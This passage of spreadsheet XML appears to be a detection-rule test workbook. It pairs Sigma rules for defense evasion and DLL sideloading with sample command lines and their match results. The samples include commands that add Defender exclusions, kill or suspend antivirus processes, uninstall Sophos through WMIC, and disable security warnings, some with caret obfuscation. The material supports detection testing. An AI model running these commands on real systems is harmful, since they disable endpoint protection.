      <c r="E3894" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(Get-Service -Name wuauserv).StartupType = 'Disabled'; Stop-Service -Name wuauserv -Force"</t>
        </is>
      </c>
      <c r="F3894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3894" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3894" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3894" s="44" t="inlineStr">
        <is>
          <t>Stop Windows Service Via PowerShell Stop-Service (c49c5062-0966-4170-9efd-9968c913a6cf)</t>
        </is>
      </c>
      <c r="J3894" s="44" t="n"/>
      <c r="K3894" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3895" ht="15.75" customHeight="1" s="42">
      <c r="A3895" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3895" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C3895" s="44" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D3895" s="44" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E3895" s="44" t="inlineStr">
        <is>
          <t>C:\\Program Files\\Symantec\\SepRemovalToolNative_x64.exe</t>
        </is>
      </c>
      <c r="F3895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3895" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3895" s="44" t="n"/>
      <c r="J3895" s="44" t="n"/>
      <c r="K3895" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3896" ht="15.75" customHeight="1" s="42">
      <c r="A3896" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3896" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C3896" s="44" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D3896" s="44" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E3896" s="44" t="inlineStr">
        <is>
          <t>C:\Program Files\Symantec\NetInstaller.exe /r</t>
        </is>
      </c>
      <c r="F3896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3896" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3896" s="44" t="n"/>
      <c r="J3896" s="44" t="n"/>
      <c r="K3896" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3897" ht="15.75" customHeight="1" s="42">
      <c r="A3897" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3897" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_pua_cleanwipe</t>
        </is>
      </c>
      <c r="C3897" s="44" t="inlineStr">
        <is>
          <t>PUA - CleanWipe Execution</t>
        </is>
      </c>
      <c r="D3897" s="44" t="inlineStr">
        <is>
          <t>f44800ac-38ec-471f-936e-3fa7d9c53100</t>
        </is>
      </c>
      <c r="E3897" s="44" t="inlineStr">
        <is>
          <t>C:\Program Files\Symantec\WFPUnins.exe /uninstall /enterprise</t>
        </is>
      </c>
      <c r="F3897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3897" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3897" s="44" t="n"/>
      <c r="J3897" s="44" t="n"/>
      <c r="K3897" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3898" ht="15.75" customHeight="1" s="42">
      <c r="A3898" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3898" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C3898" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3898" s="44" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E3898" s="44" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /t REG_DWORD /v "TestExclusion" /d 0</t>
        </is>
      </c>
      <c r="F3898" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3898" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3898" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J3898" s="44" t="n"/>
      <c r="K3898" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3899" ht="15.75" customHeight="1" s="42">
      <c r="A3899" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3899" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C3899" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3899" s="44" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E3899" s="44" t="inlineStr">
        <is>
          <t>reg.exe ADD /t REG_DWORD /v TestExclusion /d 0 "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"</t>
        </is>
      </c>
      <c r="F3899" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3899" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3899" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829); Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J3899" s="44" t="n"/>
      <c r="K3899" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3900" ht="15.75" customHeight="1" s="42">
      <c r="A3900" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3900" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C3900" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3900" s="44" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E3900" s="44" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /tREG_DWORD /vTestExclusion /d0</t>
        </is>
      </c>
      <c r="F3900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3900" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3900" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3900" s="44" t="inlineStr">
        <is>
          <t>Reg Add Suspicious Paths (b7e2a8d4-74bb-4b78-adc9-3f92af2d4829)</t>
        </is>
      </c>
      <c r="J3900" s="44" t="n"/>
      <c r="K3900" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3901" ht="15.75" customHeight="1" s="42">
      <c r="A3901" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3901" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_reg_defender_exclusion</t>
        </is>
      </c>
      <c r="C3901" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE</t>
        </is>
      </c>
      <c r="D3901" s="44" t="inlineStr">
        <is>
          <t>48917adc-a28e-4f5d-b729-11e75da8941f</t>
        </is>
      </c>
      <c r="E3901" s="44" t="inlineStr">
        <is>
          <t>reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths" /t REG_DWORD /v "TestExclusion" /d 0</t>
        </is>
      </c>
      <c r="F3901" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3901" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3901" s="44" t="inlineStr">
        <is>
          <t>Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE (48917adc-a28e-4f5d-b729-11e75da8941f)</t>
        </is>
      </c>
      <c r="J3901" s="44" t="n"/>
      <c r="K3901" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3902" ht="15.75" customHeight="1" s="42">
      <c r="A3902" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3902" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_office_disable_python_security_warnings</t>
        </is>
      </c>
      <c r="C3902" s="44" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel</t>
        </is>
      </c>
      <c r="D3902" s="44" t="inlineStr">
        <is>
          <t>023c654f-8f16-44d9-bb2b-00ff36a62af9</t>
        </is>
      </c>
      <c r="E3902" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Microsoft\Office\16.0\Excel\Security" /v "PythonFunctionWarnings" /t REG_DWORD /d 0x0 /f</t>
        </is>
      </c>
      <c r="F3902" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3902" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3902" s="44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3902" s="44" t="n"/>
      <c r="K3902" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3903" ht="15.75" customHeight="1" s="42">
      <c r="A3903" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3903" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_office_disable_python_security_warnings</t>
        </is>
      </c>
      <c r="C3903" s="44" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel</t>
        </is>
      </c>
      <c r="D3903" s="44" t="inlineStr">
        <is>
          <t>023c654f-8f16-44d9-bb2b-00ff36a62af9</t>
        </is>
      </c>
      <c r="E3903" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "reg add "HKCU\Software\Microsoft\Office\16.0\Excel\Security" /v Py^thonFunctionWarnings /t REG_DWORD /d 0 /f"</t>
        </is>
      </c>
      <c r="F3903" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3903" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3903" s="44" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel (023c654f-8f16-44d9-bb2b-00ff36a62af9)</t>
        </is>
      </c>
      <c r="J3903" s="44" t="n"/>
      <c r="K3903" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3904" ht="15.75" customHeight="1" s="42">
      <c r="A3904" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3904" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_office_disable_python_security_warnings</t>
        </is>
      </c>
      <c r="C3904" s="44" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel</t>
        </is>
      </c>
      <c r="D3904" s="44" t="inlineStr">
        <is>
          <t>023c654f-8f16-44d9-bb2b-00ff36a62af9</t>
        </is>
      </c>
      <c r="E3904" s="44" t="inlineStr">
        <is>
          <t>reg.exe add "HKCU\Software\Microsoft\Office\16.0\Excel\Security" /v PythonFunctionWarnings /t REG_DWORD /d 00 /f</t>
        </is>
      </c>
      <c r="F3904" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3904" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3904" s="44" t="inlineStr">
        <is>
          <t>Python Function Execution Security Warning Disabled In Excel (023c654f-8f16-44d9-bb2b-00ff36a62af9); Python Function Execution Security Warning Disabled In Excel (023c654f-8f16-44d9-bb2b-00ff36a62af9)</t>
        </is>
      </c>
      <c r="J3904" s="44" t="n"/>
      <c r="K3904" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3905" ht="15.75" customHeight="1" s="42">
      <c r="A3905" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3905" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_disable_raccine</t>
        </is>
      </c>
      <c r="C3905" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall</t>
        </is>
      </c>
      <c r="D3905" s="44" t="inlineStr">
        <is>
          <t>a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc</t>
        </is>
      </c>
      <c r="E3905" s="44" t="inlineStr">
        <is>
          <t>reg.exe delete "HKCU\Software\Raccine" /v "Raccine Tray"</t>
        </is>
      </c>
      <c r="F3905" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3905" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3905" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc); Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J3905" s="44" t="n"/>
      <c r="K3905" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3906" ht="15.75" customHeight="1" s="42">
      <c r="A3906" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3906" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_disable_raccine</t>
        </is>
      </c>
      <c r="C3906" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall</t>
        </is>
      </c>
      <c r="D3906" s="44" t="inlineStr">
        <is>
          <t>a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc</t>
        </is>
      </c>
      <c r="E3906" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c schtasks /D^ELETE /TN "Raccine Rules Updater" /F</t>
        </is>
      </c>
      <c r="F3906" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3906" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3906" s="44" t="inlineStr">
        <is>
          <t>Raccine Uninstall (a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc)</t>
        </is>
      </c>
      <c r="J3906" s="44" t="n"/>
      <c r="K3906" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3907" ht="15.75" customHeight="1" s="42">
      <c r="A3907" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3907" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_pssuspend_susp_execution</t>
        </is>
      </c>
      <c r="C3907" s="44" t="inlineStr">
        <is>
          <t>Sysinternals PsSuspend Suspicious Execution</t>
        </is>
      </c>
      <c r="D3907" s="44" t="inlineStr">
        <is>
          <t>4beb6ae0-f85b-41e2-8f18-8668abc8af78</t>
        </is>
      </c>
      <c r="E3907" s="44" t="inlineStr">
        <is>
          <t>pssuspend.exe "msmpeng.exe"</t>
        </is>
      </c>
      <c r="F3907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3907" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3907" s="44" t="n"/>
      <c r="J3907" s="44" t="n"/>
      <c r="K3907" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3908" ht="15.75" customHeight="1" s="42">
      <c r="A3908" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3908" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sysinternals_pssuspend_susp_execution</t>
        </is>
      </c>
      <c r="C3908" s="44" t="inlineStr">
        <is>
          <t>Sysinternals PsSuspend Suspicious Execution</t>
        </is>
      </c>
      <c r="D3908" s="44" t="inlineStr">
        <is>
          <t>4beb6ae0-f85b-41e2-8f18-8668abc8af78</t>
        </is>
      </c>
      <c r="E3908" s="44" t="inlineStr">
        <is>
          <t>pssuspend.exe msmpeng</t>
        </is>
      </c>
      <c r="F3908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3908" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3908" s="44" t="n"/>
      <c r="J3908" s="44" t="n"/>
      <c r="K3908" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3909" ht="15.75" customHeight="1" s="42">
      <c r="A3909" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3909" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_taskkill_sep</t>
        </is>
      </c>
      <c r="C3909" s="44" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection</t>
        </is>
      </c>
      <c r="D3909" s="44" t="inlineStr">
        <is>
          <t>4a6713f6-3331-11ed-a261-0242ac120002</t>
        </is>
      </c>
      <c r="E3909" s="44" t="inlineStr">
        <is>
          <t>taskkill /f /im ccSvcHst.exe</t>
        </is>
      </c>
      <c r="F3909" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3909" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3909" s="44" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection (4a6713f6-3331-11ed-a261-0242ac120002); Taskkill Symantec Endpoint Protection (4a6713f6-3331-11ed-a261-0242ac120002)</t>
        </is>
      </c>
      <c r="J3909" s="44" t="n"/>
      <c r="K3909" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3910" ht="15.75" customHeight="1" s="42">
      <c r="A3910" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3910" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_taskkill_sep</t>
        </is>
      </c>
      <c r="C3910" s="44" t="inlineStr">
        <is>
          <t>Taskkill Symantec Endpoint Protection</t>
        </is>
      </c>
      <c r="D3910" s="44" t="inlineStr">
        <is>
          <t>4a6713f6-3331-11ed-a261-0242ac120002</t>
        </is>
      </c>
      <c r="E3910" s="44" t="inlineStr">
        <is>
          <t>taskkill /F/IM ccSvcHst.exe</t>
        </is>
      </c>
      <c r="F3910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G3910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3910" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3910" s="44" t="n"/>
      <c r="J3910" s="44" t="n"/>
      <c r="K3910" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3911" ht="15.75" customHeight="1" s="42">
      <c r="A3911" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3911" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_werfaultsecure_process_freeze</t>
        </is>
      </c>
      <c r="C3911" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze</t>
        </is>
      </c>
      <c r="D3911" s="44" t="inlineStr">
        <is>
          <t>1f0b4cac-9c81-41f4-95d0-8475ff46b3e2</t>
        </is>
      </c>
      <c r="E3911" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\WerFaultSecure.exe /h  /pid 1234 /tid 5678 /encfile C:\path\to\file /cancel /type 268310</t>
        </is>
      </c>
      <c r="F3911" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3911" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3911" s="44" t="inlineStr">
        <is>
          <t>Suspicious Process Suspension via WERFaultSecure through EDR-Freeze (1f0b4cac-9c81-41f4-95d0-8475ff46b3e2)</t>
        </is>
      </c>
      <c r="J3911" s="44" t="n"/>
      <c r="K3911" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3912" ht="15.75" customHeight="1" s="42">
      <c r="A3912" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3912" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3912" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3912" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3912" s="44" t="inlineStr">
        <is>
          <t>wmic product  where  name="Sophos Anti-Virus" call uninstall /nointeractive</t>
        </is>
      </c>
      <c r="F3912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3912" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3912" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3912" s="44" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J3912" s="44" t="n"/>
      <c r="K3912" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3913" ht="15.75" customHeight="1" s="42">
      <c r="A3913" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3913" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3913" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3913" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3913" s="44" t="inlineStr">
        <is>
          <t>wmic "product" "where" name="Sophos Anti-Virus" call uninstall /nointeractive</t>
        </is>
      </c>
      <c r="F3913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3913" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3913" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3913" s="44" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J3913" s="44" t="n"/>
      <c r="K3913" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3914" ht="15.75" customHeight="1" s="42">
      <c r="A3914" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3914" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3914" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3914" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3914" s="44" t="inlineStr">
        <is>
          <t>wmic product where name="Sophos Anti-Virus" call uninstall -nointeractive</t>
        </is>
      </c>
      <c r="F3914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3914" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3914" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3914" s="44" t="inlineStr">
        <is>
          <t>Potential Product Reconnaissance Via Wmic.EXE (15434e33-5027-4914-88d5-3d4145ec25a9); Application Removed Via Wmic.EXE (b53317a0-8acf-4fd1-8de8-a5401e776b96)</t>
        </is>
      </c>
      <c r="J3914" s="44" t="n"/>
      <c r="K3914" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3915" ht="15.75" customHeight="1" s="42">
      <c r="A3915" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3915" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3915" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3915" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3915" s="44" t="inlineStr">
        <is>
          <t>wmic process where "name like '%%Sophos%%'" call delete</t>
        </is>
      </c>
      <c r="F3915" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3915" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3915" s="44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J3915" s="44" t="n"/>
      <c r="K3915" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3916" ht="15.75" customHeight="1" s="42">
      <c r="A3916" s="44" t="inlineStr">
        <is>
          <t>t1562.001</t>
        </is>
      </c>
      <c r="B3916" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_uninstall_security_products</t>
        </is>
      </c>
      <c r="C3916" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC</t>
        </is>
      </c>
      <c r="D3916" s="44" t="inlineStr">
        <is>
          <t>847d5ff3-8a31-4737-a970-aeae8fe21765</t>
        </is>
      </c>
      <c r="E3916" s="44" t="inlineStr">
        <is>
          <t>wmic process where (name="Sophos Anti-Virus") delete</t>
        </is>
      </c>
      <c r="F3916" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3916" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3916" s="44" t="inlineStr">
        <is>
          <t>Potential Tampering With Security Products Via WMIC (847d5ff3-8a31-4737-a970-aeae8fe21765); Potential Tampering With Security Products Via WMIC (847d5ff3-8a31-4737-a970-aeae8fe21765); Process Reconnaissance Via Wmic.EXE (221b251a-357a-49a9-920a-271802777cc0)</t>
        </is>
      </c>
      <c r="J3916" s="44" t="n"/>
      <c r="K3916" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3917" ht="15.75" customHeight="1" s="42">
      <c r="A3917" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3917" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C3917" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D3917" s="44" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E3917" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\DeviceEnroller.exe "/PhoneDeepLink" AnyStringDataHere</t>
        </is>
      </c>
      <c r="F3917" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3917" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3917" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE (e173ad47-4388-4012-ae62-bd13f71c18a8)</t>
        </is>
      </c>
      <c r="J3917" s="44" t="n"/>
      <c r="K3917" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3918" ht="15.75" customHeight="1" s="42">
      <c r="A3918" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3918" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C3918" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE</t>
        </is>
      </c>
      <c r="D3918" s="44" t="inlineStr">
        <is>
          <t>e173ad47-4388-4012-ae62-bd13f71c18a8</t>
        </is>
      </c>
      <c r="E3918" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\System32\DeviceEnroller.exe /PhoneD^eepLink AnyStringDataHere</t>
        </is>
      </c>
      <c r="F3918" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H3918" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3918" s="44" t="inlineStr">
        <is>
          <t>Potential DLL Sideloading Via DeviceEnroller.EXE (e173ad47-4388-4012-ae62-bd13f71c18a8)</t>
        </is>
      </c>
      <c r="J3918" s="44" t="n"/>
      <c r="K3918" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3919" ht="15.75" customHeight="1" s="42">
      <c r="A3919" s="44" t="inlineStr">
        <is>
          <t>t1574.001</t>
        </is>
      </c>
      <c r="B3919" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_deviceenroller_dll_sideloading</t>
        </is>
      </c>
      <c r="C3919" s="44" t="inlineStr">
        <is>
